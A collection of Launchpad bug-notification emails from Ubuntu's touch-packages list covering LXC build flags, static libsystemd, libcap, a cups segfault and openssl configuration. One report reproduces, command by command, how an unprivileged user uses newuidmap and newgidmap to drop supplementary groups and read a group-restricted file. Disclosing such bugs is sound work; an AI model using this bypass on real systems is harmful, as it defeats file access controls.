[Touch-packages] [Bug 2039873] Re: liblxc-dev was built with LXC_DEVEL=1 in Ubuntu Jammy/Kinetic

[Serge Hallyn]

> Looking at the changelog, it appears that Serge simply pulled all
changes following 5.0.1 from git, which he likely did mistakenly looking
at the master branch rather than the stable-5.0 branch which wouldn't
have had that particular change.

That sounds like exactly what I would do.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/2039873

Title:
  liblxc-dev was built with LXC_DEVEL=1 in Ubuntu Jammy/Kinetic

Status in lxc package in Ubuntu:
  Confirmed

Bug description:
  [ Impact ]

  LXC 5.0.0 was built with LXC_DEVEL=1 set for Jammy. But for release
  build we should have LXC_DEVEL=0.

  LXC_DEVEL is a variable that appears in the /usr/include/lxc/version.h
  and then can be (and actually it is) used by other projects to detect
  if liblxc-dev is a development build or stable.

  Having LXC_DEVEL=1 makes problems for the users who want to build projects 
those are depend on liblxc
  from source (for example, LXD, go-lxc: 
https://github.com/canonical/lxd/pull/12420).

  Q: Why it was not a problem for so long?
  A: Because LXC API was stable for a long time, but recently we have extended 
liblxc API (https://github.com/lxc/lxc/pull/4260) and dependant package go-lxc 
was updated too (https://github.com/lxc/go-lxc/pull/166).
  This change was developed properly to be backward compatible with the old 
versions of liblxc. But, there is a problem. If LXC_DEVEL=1 then the macro 
check VERSION_AT_LEAST 
(https://github.com/lxc/go-lxc/blob/ccae595aa49e779f7ecc9250329967aa546acd31/lxc-binding.h#L7)
 is disabled. That's why we should *not* have LXC_DEVEL=1 for *any* release 
build of LXC.

  [ Test Plan ]

  Install liblxc-dev package and check /usr/include/lxc/version.h file
  LXC_DEVEL should be 0

  [ Where problems could occur ]

  Theoretically, build of a software which depends on liblxc-dev may start to 
fail
  if it assumes that LXC_DEVEL is 1.

  [ Other Info ]

  -

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/2039873/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1729357] Re: unprivileged user can drop supplementary groups

[Serge Hallyn]

** Changed in: shadow (Ubuntu)
   Importance: Undecided => Low

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to shadow in Ubuntu.
https://bugs.launchpad.net/bugs/1729357

Title:
  unprivileged user can drop supplementary groups

Status in shadow package in Ubuntu:
  Confirmed
Status in shadow package in openSUSE:
  Fix Released

Bug description:
  Distribution: Ubuntu 16.04.3 LTS
  Kernel: 4.4.0-97-generic
  uidmap package version: 1:4.2-3.1ubuntu5.3

  The newgidmap setuid executable allows any user to write a single
  mapping line to the gid_map of a process whose identity is the same as
  the calling process, as long as that mapping line maps the process's
  own GID outside of the user namespace to GID 0 inside the user
  namespace.

  Newgidmap will write the mapping regardless of the content of
  /proc/$process_being_mapped/setgroups, which will initially contain
  the string "allow". After this mapping is performed, and also after
  the process' uid_map is written with newuidmap, the process in the
  user namespace will be able to use the setgroups system call to drop
  supplementary groups.

  This is possible even if there is no entry for the user in
  /etc/subgid, because no subordinate GIDs are actually being used.

  This allows any user to circumvent the use of supplementary groups as
  blacklists, e.g. for some file owned by root:blacklist with permission
  bits 0604 (octal). Normally any process whose identity included the
  group "blacklist" in its supplementary groups would not be able to
  read that file. By performing this exploit using newgidmap, they can
  drop all supplementary groups and read that file.

  If newgidmap was not available, unprivileged users would not be able
  to write a process's gid_map until writing "deny" to
  /proc/$pid/setgroups. A fix for this might be for newgidmap to check
  the content of /proc/$process_being_mapped/setgroups is "deny", but we
  have not tried to patch this ourselves.

  An example using 2 login shells for a user named "someone" on Ubuntu
  Xenial, with the uidmap package installed:

  Shell 1

  someone@ubuntu-xenial:~$ id
  uid=1001(someone) gid=1001(someone) groups=1001(someone),1002(restricted)

  someone@ubuntu-xenial:~$ ls -al /tmp/should_restrict
  -rwr-- 1 root restricted 8 Nov  1 12:23 /tmp/should_restrict

  someone@ubuntu-xenial:~$ cat /tmp/should_restrict
  cat: /tmp/should_restrict: Permission denied

  someone@ubuntu-xenial:~$ unshare -U --setgroups allow #
  /proc/self/setgroups already contains 'allow', but let's be explicit

  nobody@ubuntu-xenial:~$ echo $$
  1878

  Shell 2

  someone@ubuntu-xenial:~$ cat /etc/subuid
  lxd:10:65536
  root:10:65536
  ubuntu:165536:65536

  someone@ubuntu-xenial:~$ cat /etc/subgid
  lxd:10:65536
  root:10:65536
  ubuntu:165536:65536

  # There are no entries in /etc/sub{u,g}id for someone, but this
  doesn't matter that much as subordinate IDs are not being requested.

  someone@ubuntu-xenial:~$ newuidmap 1878 0 1001 1

  someone@ubuntu-xenial:~$ newgidmap 1878 0 1001 1

  Back to shell 1

  nobody@ubuntu-xenial:~$ id
  uid=0(root) gid=0(root) groups=0(root),65534(nogroup)

  # The presence of the "nogroup" supplementary group indicates that
  some unmapped GIDs are present as supplementary GIDs. The kernel knows
  that this process still has "restricted" in its supplementary groups,
  so it can't read the restricted file yet.

  nobody@ubuntu-xenial:~$ cat /tmp/should_restrict
  cat: /tmp/should_restrict: Permission denied

  # The process has gained CAP_SETGID in its user namespace by becoming
  UID 0. /proc/$pid/setgroups contains "allow", so it can call
  setgroups(2). By su-ing to root (itself, in the user namespace), it
  can drop the supplementary groups. It can't read /root/.bashrc as that
  file is owned by UID 0 in the initial user namespace, which creates
  some distracting error output but doesn't matter in this case.

  nobody@ubuntu-xenial:~$ su root
  su: Authentication failure
  (Ignored)
  bash: /root/.bashrc: Permission denied

  # Supplementary groups have been dropped

  root@ubuntu-xenial:~# id
  uid=0(root) gid=0(root) groups=0(root)

  # It can read the restricted file

  root@ubuntu-xenial:~# cat /tmp/should_restrict
  content

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 2012437] [NEW] Ship a static libsystemd.a

[Serge Hallyn]

Public bug reported:

More and more things are requiring linking against libsystemd.  In
particular, because dbus is now linked against libsystemd, anything that
wants to make a dbus client call needs it.  By not shipping a static
libsystemd.a, all such users are prevented from building statically.
This includes tools like the lxc-init container init, and stacker
container build tool, which both want to be re-execed inside a container
which may have completely different - or no - distro.

With the attached debdiff, libsystemd-dev ships a libsystem.a so tools
can be built statically.

The package has been built (for lunar) with this debdiff at ppa:serge-
hallyn/systemd.

** Affects: systemd (Ubuntu)
 Importance: Undecided
 Status: New

** Attachment added: "debdiff against lunar's systemd package"
   
https://bugs.launchpad.net/bugs/2012437/+attachment/5656400/+files/systemd_252.5-2ubuntu2.debdiff

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to systemd in Ubuntu.
https://bugs.launchpad.net/bugs/2012437

Title:
  Ship a static libsystemd.a

Status in systemd package in Ubuntu:
  New

Bug description:
  More and more things are requiring linking against libsystemd.  In
  particular, because dbus is now linked against libsystemd, anything
  that wants to make a dbus client call needs it.  By not shipping a
  static libsystemd.a, all such users are prevented from building
  statically.  This includes tools like the lxc-init container init, and
  stacker container build tool, which both want to be re-execed inside a
  container which may have completely different - or no - distro.

  With the attached debdiff, libsystemd-dev ships a libsystem.a so tools
  can be built statically.

  The package has been built (for lunar) with this debdiff at ppa:serge-
  hallyn/systemd.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/systemd/+bug/2012437/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1700814] Re: Default capability of cap_setfcap+i should be set on setcap

[Serge Hallyn]

> FWIW This used to be the default inside the libcap build tree, but the
> problems with the container defaults (eventually fixed with
> https://github.com/moby/moby/security/advisories/GHSA-2mm7-x5h6-5pvq

Thanks for the links.  For a moment I was worried that there was an
issue with containers in general, but I see, this is an implementation
issue with one container engine implementation.

And...  they rated the importance low?

>  ) changed my position on this:

>
https://git.kernel.org/pub/scm/libs/libcap/libcap.git/commit/?id=2b5f5635be6131d7e89b4c6244b29f32ebd163c1

Hm.  Maybe this is the wrong place to discuss this.  I started this
comment intending to propose the opposite, but indeed if admins are
expected to use pam to set pI per username, then perhaps it is best if
they also have to set fI on each program they intend it to exist on,
since otherwise they may not *really* be sure what they are handing
the user...

Andrew, is it your intention to leave libcap's install without the fI?
If so then we should either (1) deliverately override Andrew's decision
during ubuntu packaging's postinst (which I don't think we should do),
or (2) mark this bug Invalid rather than Incomplete.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libcap2 in Ubuntu.
https://bugs.launchpad.net/bugs/1700814

Title:
  Default capability of cap_setfcap+i should be set on setcap

Status in libcap2 package in Ubuntu:
  Incomplete

Bug description:
  If I grant a user (via pam_cap) cap_setfcap+i, I would then expect
  them to be able to use setcap without sudo. setcap is not provided
  with any default file capabilities however, so either the user has to
  sudo, or I have to grant the setfcap capability to setcap with setcap.

  In my mind, it would be reasonable to grant setfcap+i to setcap by
  default on installation.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/libcap2/+bug/1700814/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1700814] Re: Default capability of cap_setfcap+i should be set on setcap

[Serge Hallyn]

** Changed in: libcap2 (Ubuntu)
 Assignee: Serge Hallyn (serge-hallyn) => Balint Reczey (rbalint)

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libcap2 in Ubuntu.
https://bugs.launchpad.net/bugs/1700814

Title:
  Default capability of cap_setfcap+i should be set on setcap

Status in libcap2 package in Ubuntu:
  New

Bug description:
  If I grant a user (via pam_cap) cap_setfcap+i, I would then expect
  them to be able to use setcap without sudo. setcap is not provided
  with any default file capabilities however, so either the user has to
  sudo, or I have to grant the setfcap capability to setcap with setcap.

  In my mind, it would be reasonable to grant setfcap+i to setcap by
  default on installation.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/libcap2/+bug/1700814/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1966590] Re: cups segfault when printing or editing printers

[Serge Hallyn]

The permission denied errors appear unrelated:  after stopping apparmor
and restarting cups, I still get:

[932499.635684] cupsd[855122]: segfault at 0 ip 7f39be2ff98c sp 
7ffc12737718 error 4 in libc.so.6[7f39be176000+195000]
[932499.635695] Code: 1e fa 89 f8 31 d2 62 a1 fd 00 ef c0 09 f0 25 ff 0f 00 00 
3d 80 0f 00 00 0f 8f 70 03 00 00 62 e1 fe 28 6f 0f 62 b2 75 20 26 d1 <62> f3 75 
22 3f 0e 00 c5 fb 93 c9 ff c1 74 45 f3 0f bc d1 0f b6 04
[932503.181032] landscape-packa[855168]: segfault at 7ff7440e7fc0 ip 
7ff32fbd3b7a sp 7ffc2e910360 error 4 in 
apt_pkg.cpython-310-x86_64-linux-gnu.so[7ff32fbcd000+1f000]
[932503.181041] Code: 48 8b 55 20 4c 8b 75 28 49 89 c4 8b 52 08 49 8b 46 50 48 
8d 14 52 4c 8d 3c d0 4c 39 f8 0f 84 b0 00 00 00 4c 8b 2d 0e 04 03 00 <41> 8b 17 
31 f6 4c 89 ef 48 8d 04 d5 00 00 00 00 48 29 d0 49 8b 56

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to cups in Ubuntu.
https://bugs.launchpad.net/bugs/1966590

Title:
  cups segfault when printing or editing printers

Status in cups package in Ubuntu:
  New

Bug description:
  Editing a printer in localhost:631, cups keeps segfaulting after
  (possibly related) access denied messages:

  [932068.059601] audit: type=1400 audit(1648388571.894:566): apparmor="DENIED" 
operation="connect" profile="/usr/bin/evince" 
name="/run/user/1000/at-spi/bus_0" pid=853633 comm="evince" requested_mask="wr" 
denied_mask="wr" fsuid=1000 ouid=1000
  [932069.716730] audit: type=1400 audit(1648388573.550:567): apparmor="DENIED" 
operation="capable" profile="/usr/sbin/cupsd" pid=853664 comm="cupsd" 
capability=12  capname="net_admin"
  [932069.797610] audit: type=1400 audit(1648388573.630:568): apparmor="DENIED" 
operation="capable" profile="/usr/sbin/cups-browsed" pid=853668 
comm="cups-browsed" capability=23  capname="sys_nice"

  ProblemType: Bug
  DistroRelease: Ubuntu 22.04
  Package: cups 2.4.1op1-1ubuntu2
  ProcVersionSignature: Ubuntu 5.15.0-22.22-generic 5.15.19
  Uname: Linux 5.15.0-22-generic x86_64
  ApportVersion: 2.20.11-0ubuntu79
  Architecture: amd64
  CasperMD5CheckResult: pass
  CupsErrorLog:
   E [27/Mar/2022:08:39:47 -0500] [Job 13] No suitable destination host found 
by cups-browsed.
   W [27/Mar/2022:08:39:47 -0500] [Job 13] Backend returned status 6 (retry job 
later)
  CurrentDesktop: qtile
  Date: Sun Mar 27 08:43:53 2022
  InstallationDate: Installed on 2022-02-25 (29 days ago)
  InstallationMedia: Ubuntu 21.10 "Impish Indri" - Release amd64 (20211012)
  Lpstat: device for HP_OfficeJet_200_Mobile_Series: 
ipps://HP%20OfficeJet%20200%20Mobile%20Series%20%5BBAD650%5D._ipps._tcp.local/
  MachineType: LENOVO 20XXS3JC01
  Papersize: letter
  PpdFiles: Error: command ['fgrep', '-H', '*NickName', 
'/etc/cups/ppd/HP_OfficeJet_200_Mobile_Series.ppd'] failed with exit code 2: 
grep: /etc/cups/ppd/HP_OfficeJet_200_Mobile_Series.ppd: Permission denied
  ProcEnviron:
   TERM=st-256color
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=
   LANG=en_US.UTF-8
   SHELL=/bin/bash
  ProcKernelCmdLine: BOOT_IMAGE=/vmlinuz-5.15.0-22-generic 
root=/dev/mapper/vgubuntu-root ro quiet splash vt.handoff=7
  SourcePackage: cups
  UpgradeStatus: Upgraded to jammy on 2022-03-16 (10 days ago)
  dmi.bios.date: 12/02/2021
  dmi.bios.release: 1.51
  dmi.bios.vendor: LENOVO
  dmi.bios.version: N32ET75W (1.51 )
  dmi.board.asset.tag: Not Available
  dmi.board.name: 20XXS3JC01
  dmi.board.vendor: LENOVO
  dmi.board.version: SDK0J40697 WIN
  dmi.chassis.asset.tag: No Asset Information
  dmi.chassis.type: 10
  dmi.chassis.vendor: LENOVO
  dmi.chassis.version: None
  dmi.ec.firmware.release: 1.32
  dmi.modalias: 
dmi:bvnLENOVO:bvrN32ET75W(1.51):bd12/02/2021:br1.51:efr1.32:svnLENOVO:pn20XXS3JC01:pvrThinkPadX1CarbonGen9:rvnLENOVO:rn20XXS3JC01:rvrSDK0J40697WIN:cvnLENOVO:ct10:cvrNone:skuLENOVO_MT_20XX_BU_Think_FM_ThinkPadX1CarbonGen9:
  dmi.product.family: ThinkPad X1 Carbon Gen 9
  dmi.product.name: 20XXS3JC01
  dmi.product.sku: LENOVO_MT_20XX_BU_Think_FM_ThinkPad X1 Carbon Gen 9
  dmi.product.version: ThinkPad X1 Carbon Gen 9
  dmi.sys.vendor: LENOVO

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/cups/+bug/1966590/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1966590] Re: cups segfault when printing or editing printers

[Serge Hallyn]

(Forcibly downgrading to the impish packages restored ability to print.)

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to cups in Ubuntu.
https://bugs.launchpad.net/bugs/1966590

Title:
  cups segfault when printing or editing printers

Status in cups package in Ubuntu:
  New

Bug description:
  Editing a printer in localhost:631, cups keeps segfaulting after
  (possibly related) access denied messages:

  [932068.059601] audit: type=1400 audit(1648388571.894:566): apparmor="DENIED" 
operation="connect" profile="/usr/bin/evince" 
name="/run/user/1000/at-spi/bus_0" pid=853633 comm="evince" requested_mask="wr" 
denied_mask="wr" fsuid=1000 ouid=1000
  [932069.716730] audit: type=1400 audit(1648388573.550:567): apparmor="DENIED" 
operation="capable" profile="/usr/sbin/cupsd" pid=853664 comm="cupsd" 
capability=12  capname="net_admin"
  [932069.797610] audit: type=1400 audit(1648388573.630:568): apparmor="DENIED" 
operation="capable" profile="/usr/sbin/cups-browsed" pid=853668 
comm="cups-browsed" capability=23  capname="sys_nice"

  ProblemType: Bug
  DistroRelease: Ubuntu 22.04
  Package: cups 2.4.1op1-1ubuntu2
  ProcVersionSignature: Ubuntu 5.15.0-22.22-generic 5.15.19
  Uname: Linux 5.15.0-22-generic x86_64
  ApportVersion: 2.20.11-0ubuntu79
  Architecture: amd64
  CasperMD5CheckResult: pass
  CupsErrorLog:
   E [27/Mar/2022:08:39:47 -0500] [Job 13] No suitable destination host found 
by cups-browsed.
   W [27/Mar/2022:08:39:47 -0500] [Job 13] Backend returned status 6 (retry job 
later)
  CurrentDesktop: qtile
  Date: Sun Mar 27 08:43:53 2022
  InstallationDate: Installed on 2022-02-25 (29 days ago)
  InstallationMedia: Ubuntu 21.10 "Impish Indri" - Release amd64 (20211012)
  Lpstat: device for HP_OfficeJet_200_Mobile_Series: 
ipps://HP%20OfficeJet%20200%20Mobile%20Series%20%5BBAD650%5D._ipps._tcp.local/
  MachineType: LENOVO 20XXS3JC01
  Papersize: letter
  PpdFiles: Error: command ['fgrep', '-H', '*NickName', 
'/etc/cups/ppd/HP_OfficeJet_200_Mobile_Series.ppd'] failed with exit code 2: 
grep: /etc/cups/ppd/HP_OfficeJet_200_Mobile_Series.ppd: Permission denied
  ProcEnviron:
   TERM=st-256color
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=
   LANG=en_US.UTF-8
   SHELL=/bin/bash
  ProcKernelCmdLine: BOOT_IMAGE=/vmlinuz-5.15.0-22-generic 
root=/dev/mapper/vgubuntu-root ro quiet splash vt.handoff=7
  SourcePackage: cups
  UpgradeStatus: Upgraded to jammy on 2022-03-16 (10 days ago)
  dmi.bios.date: 12/02/2021
  dmi.bios.release: 1.51
  dmi.bios.vendor: LENOVO
  dmi.bios.version: N32ET75W (1.51 )
  dmi.board.asset.tag: Not Available
  dmi.board.name: 20XXS3JC01
  dmi.board.vendor: LENOVO
  dmi.board.version: SDK0J40697 WIN
  dmi.chassis.asset.tag: No Asset Information
  dmi.chassis.type: 10
  dmi.chassis.vendor: LENOVO
  dmi.chassis.version: None
  dmi.ec.firmware.release: 1.32
  dmi.modalias: 
dmi:bvnLENOVO:bvrN32ET75W(1.51):bd12/02/2021:br1.51:efr1.32:svnLENOVO:pn20XXS3JC01:pvrThinkPadX1CarbonGen9:rvnLENOVO:rn20XXS3JC01:rvrSDK0J40697WIN:cvnLENOVO:ct10:cvrNone:skuLENOVO_MT_20XX_BU_Think_FM_ThinkPadX1CarbonGen9:
  dmi.product.family: ThinkPad X1 Carbon Gen 9
  dmi.product.name: 20XXS3JC01
  dmi.product.sku: LENOVO_MT_20XX_BU_Think_FM_ThinkPad X1 Carbon Gen 9
  dmi.product.version: ThinkPad X1 Carbon Gen 9
  dmi.sys.vendor: LENOVO

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/cups/+bug/1966590/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1966590] [NEW] cups segfault when printing or editing printers

[Serge Hallyn]

Public bug reported:

Editing a printer in localhost:631, cups keeps segfaulting after
(possibly related) access denied messages:

[932068.059601] audit: type=1400 audit(1648388571.894:566): apparmor="DENIED" 
operation="connect" profile="/usr/bin/evince" 
name="/run/user/1000/at-spi/bus_0" pid=853633 comm="evince" requested_mask="wr" 
denied_mask="wr" fsuid=1000 ouid=1000
[932069.716730] audit: type=1400 audit(1648388573.550:567): apparmor="DENIED" 
operation="capable" profile="/usr/sbin/cupsd" pid=853664 comm="cupsd" 
capability=12  capname="net_admin"
[932069.797610] audit: type=1400 audit(1648388573.630:568): apparmor="DENIED" 
operation="capable" profile="/usr/sbin/cups-browsed" pid=853668 
comm="cups-browsed" capability=23  capname="sys_nice"

ProblemType: Bug
DistroRelease: Ubuntu 22.04
Package: cups 2.4.1op1-1ubuntu2
ProcVersionSignature: Ubuntu 5.15.0-22.22-generic 5.15.19
Uname: Linux 5.15.0-22-generic x86_64
ApportVersion: 2.20.11-0ubuntu79
Architecture: amd64
CasperMD5CheckResult: pass
CupsErrorLog:
 E [27/Mar/2022:08:39:47 -0500] [Job 13] No suitable destination host found by 
cups-browsed.
 W [27/Mar/2022:08:39:47 -0500] [Job 13] Backend returned status 6 (retry job 
later)
CurrentDesktop: qtile
Date: Sun Mar 27 08:43:53 2022
InstallationDate: Installed on 2022-02-25 (29 days ago)
InstallationMedia: Ubuntu 21.10 "Impish Indri" - Release amd64 (20211012)
Lpstat: device for HP_OfficeJet_200_Mobile_Series: 
ipps://HP%20OfficeJet%20200%20Mobile%20Series%20%5BBAD650%5D._ipps._tcp.local/
MachineType: LENOVO 20XXS3JC01
Papersize: letter
PpdFiles: Error: command ['fgrep', '-H', '*NickName', 
'/etc/cups/ppd/HP_OfficeJet_200_Mobile_Series.ppd'] failed with exit code 2: 
grep: /etc/cups/ppd/HP_OfficeJet_200_Mobile_Series.ppd: Permission denied
ProcEnviron:
 TERM=st-256color
 PATH=(custom, no user)
 XDG_RUNTIME_DIR=
 LANG=en_US.UTF-8
 SHELL=/bin/bash
ProcKernelCmdLine: BOOT_IMAGE=/vmlinuz-5.15.0-22-generic 
root=/dev/mapper/vgubuntu-root ro quiet splash vt.handoff=7
SourcePackage: cups
UpgradeStatus: Upgraded to jammy on 2022-03-16 (10 days ago)
dmi.bios.date: 12/02/2021
dmi.bios.release: 1.51
dmi.bios.vendor: LENOVO
dmi.bios.version: N32ET75W (1.51 )
dmi.board.asset.tag: Not Available
dmi.board.name: 20XXS3JC01
dmi.board.vendor: LENOVO
dmi.board.version: SDK0J40697 WIN
dmi.chassis.asset.tag: No Asset Information
dmi.chassis.type: 10
dmi.chassis.vendor: LENOVO
dmi.chassis.version: None
dmi.ec.firmware.release: 1.32
dmi.modalias: 
dmi:bvnLENOVO:bvrN32ET75W(1.51):bd12/02/2021:br1.51:efr1.32:svnLENOVO:pn20XXS3JC01:pvrThinkPadX1CarbonGen9:rvnLENOVO:rn20XXS3JC01:rvrSDK0J40697WIN:cvnLENOVO:ct10:cvrNone:skuLENOVO_MT_20XX_BU_Think_FM_ThinkPadX1CarbonGen9:
dmi.product.family: ThinkPad X1 Carbon Gen 9
dmi.product.name: 20XXS3JC01
dmi.product.sku: LENOVO_MT_20XX_BU_Think_FM_ThinkPad X1 Carbon Gen 9
dmi.product.version: ThinkPad X1 Carbon Gen 9
dmi.sys.vendor: LENOVO

** Affects: cups (Ubuntu)
 Importance: Undecided
 Status: New


** Tags: amd64 apport-bug jammy

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to cups in Ubuntu.
https://bugs.launchpad.net/bugs/1966590

Title:
  cups segfault when printing or editing printers

Status in cups package in Ubuntu:
  New

Bug description:
  Editing a printer in localhost:631, cups keeps segfaulting after
  (possibly related) access denied messages:

  [932068.059601] audit: type=1400 audit(1648388571.894:566): apparmor="DENIED" 
operation="connect" profile="/usr/bin/evince" 
name="/run/user/1000/at-spi/bus_0" pid=853633 comm="evince" requested_mask="wr" 
denied_mask="wr" fsuid=1000 ouid=1000
  [932069.716730] audit: type=1400 audit(1648388573.550:567): apparmor="DENIED" 
operation="capable" profile="/usr/sbin/cupsd" pid=853664 comm="cupsd" 
capability=12  capname="net_admin"
  [932069.797610] audit: type=1400 audit(1648388573.630:568): apparmor="DENIED" 
operation="capable" profile="/usr/sbin/cups-browsed" pid=853668 
comm="cups-browsed" capability=23  capname="sys_nice"

  ProblemType: Bug
  DistroRelease: Ubuntu 22.04
  Package: cups 2.4.1op1-1ubuntu2
  ProcVersionSignature: Ubuntu 5.15.0-22.22-generic 5.15.19
  Uname: Linux 5.15.0-22-generic x86_64
  ApportVersion: 2.20.11-0ubuntu79
  Architecture: amd64
  CasperMD5CheckResult: pass
  CupsErrorLog:
   E [27/Mar/2022:08:39:47 -0500] [Job 13] No suitable destination host found 
by cups-browsed.
   W [27/Mar/2022:08:39:47 -0500] [Job 13] Backend returned status 6 (retry job 
later)
  CurrentDesktop: qtile
  Date: Sun Mar 27 08:43:53 2022
  InstallationDate: Installed on 2022-02-25 (29 days ago)
  InstallationMedia: Ubuntu 21.10 "Impish Indri" - Release amd64 (20211012)
  Lpstat: device for HP_OfficeJet_200_Mobile_Series: 
ipps://HP%20OfficeJet%20200%20Mobile%20Series%20%5BBAD650%5D._ipps._tcp.local/
  MachineType: LENOVO 20XXS3JC01
  Papersize: letter
  PpdFiles: Error: command ['fgrep', '-H', '*NickName', 

[Touch-packages] [Bug 1966590] Re: cups segfault when printing or editing printers

[Serge Hallyn]

This makes it impossible for me to print from my laptop :(

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to cups in Ubuntu.
https://bugs.launchpad.net/bugs/1966590

Title:
  cups segfault when printing or editing printers

Status in cups package in Ubuntu:
  New

Bug description:
  Editing a printer in localhost:631, cups keeps segfaulting after
  (possibly related) access denied messages:

  [932068.059601] audit: type=1400 audit(1648388571.894:566): apparmor="DENIED" 
operation="connect" profile="/usr/bin/evince" 
name="/run/user/1000/at-spi/bus_0" pid=853633 comm="evince" requested_mask="wr" 
denied_mask="wr" fsuid=1000 ouid=1000
  [932069.716730] audit: type=1400 audit(1648388573.550:567): apparmor="DENIED" 
operation="capable" profile="/usr/sbin/cupsd" pid=853664 comm="cupsd" 
capability=12  capname="net_admin"
  [932069.797610] audit: type=1400 audit(1648388573.630:568): apparmor="DENIED" 
operation="capable" profile="/usr/sbin/cups-browsed" pid=853668 
comm="cups-browsed" capability=23  capname="sys_nice"

  ProblemType: Bug
  DistroRelease: Ubuntu 22.04
  Package: cups 2.4.1op1-1ubuntu2
  ProcVersionSignature: Ubuntu 5.15.0-22.22-generic 5.15.19
  Uname: Linux 5.15.0-22-generic x86_64
  ApportVersion: 2.20.11-0ubuntu79
  Architecture: amd64
  CasperMD5CheckResult: pass
  CupsErrorLog:
   E [27/Mar/2022:08:39:47 -0500] [Job 13] No suitable destination host found 
by cups-browsed.
   W [27/Mar/2022:08:39:47 -0500] [Job 13] Backend returned status 6 (retry job 
later)
  CurrentDesktop: qtile
  Date: Sun Mar 27 08:43:53 2022
  InstallationDate: Installed on 2022-02-25 (29 days ago)
  InstallationMedia: Ubuntu 21.10 "Impish Indri" - Release amd64 (20211012)
  Lpstat: device for HP_OfficeJet_200_Mobile_Series: 
ipps://HP%20OfficeJet%20200%20Mobile%20Series%20%5BBAD650%5D._ipps._tcp.local/
  MachineType: LENOVO 20XXS3JC01
  Papersize: letter
  PpdFiles: Error: command ['fgrep', '-H', '*NickName', 
'/etc/cups/ppd/HP_OfficeJet_200_Mobile_Series.ppd'] failed with exit code 2: 
grep: /etc/cups/ppd/HP_OfficeJet_200_Mobile_Series.ppd: Permission denied
  ProcEnviron:
   TERM=st-256color
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=
   LANG=en_US.UTF-8
   SHELL=/bin/bash
  ProcKernelCmdLine: BOOT_IMAGE=/vmlinuz-5.15.0-22-generic 
root=/dev/mapper/vgubuntu-root ro quiet splash vt.handoff=7
  SourcePackage: cups
  UpgradeStatus: Upgraded to jammy on 2022-03-16 (10 days ago)
  dmi.bios.date: 12/02/2021
  dmi.bios.release: 1.51
  dmi.bios.vendor: LENOVO
  dmi.bios.version: N32ET75W (1.51 )
  dmi.board.asset.tag: Not Available
  dmi.board.name: 20XXS3JC01
  dmi.board.vendor: LENOVO
  dmi.board.version: SDK0J40697 WIN
  dmi.chassis.asset.tag: No Asset Information
  dmi.chassis.type: 10
  dmi.chassis.vendor: LENOVO
  dmi.chassis.version: None
  dmi.ec.firmware.release: 1.32
  dmi.modalias: 
dmi:bvnLENOVO:bvrN32ET75W(1.51):bd12/02/2021:br1.51:efr1.32:svnLENOVO:pn20XXS3JC01:pvrThinkPadX1CarbonGen9:rvnLENOVO:rn20XXS3JC01:rvrSDK0J40697WIN:cvnLENOVO:ct10:cvrNone:skuLENOVO_MT_20XX_BU_Think_FM_ThinkPadX1CarbonGen9:
  dmi.product.family: ThinkPad X1 Carbon Gen 9
  dmi.product.name: 20XXS3JC01
  dmi.product.sku: LENOVO_MT_20XX_BU_Think_FM_ThinkPad X1 Carbon Gen 9
  dmi.product.version: ThinkPad X1 Carbon Gen 9
  dmi.sys.vendor: LENOVO

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/cups/+bug/1966590/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1963834] Re: openssl 3.0 - SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED]

[Serge Hallyn]

Ok, I did get my case to work by creating ~/ssl.conf containing:

openssl_conf = openssl_init

[openssl_init]
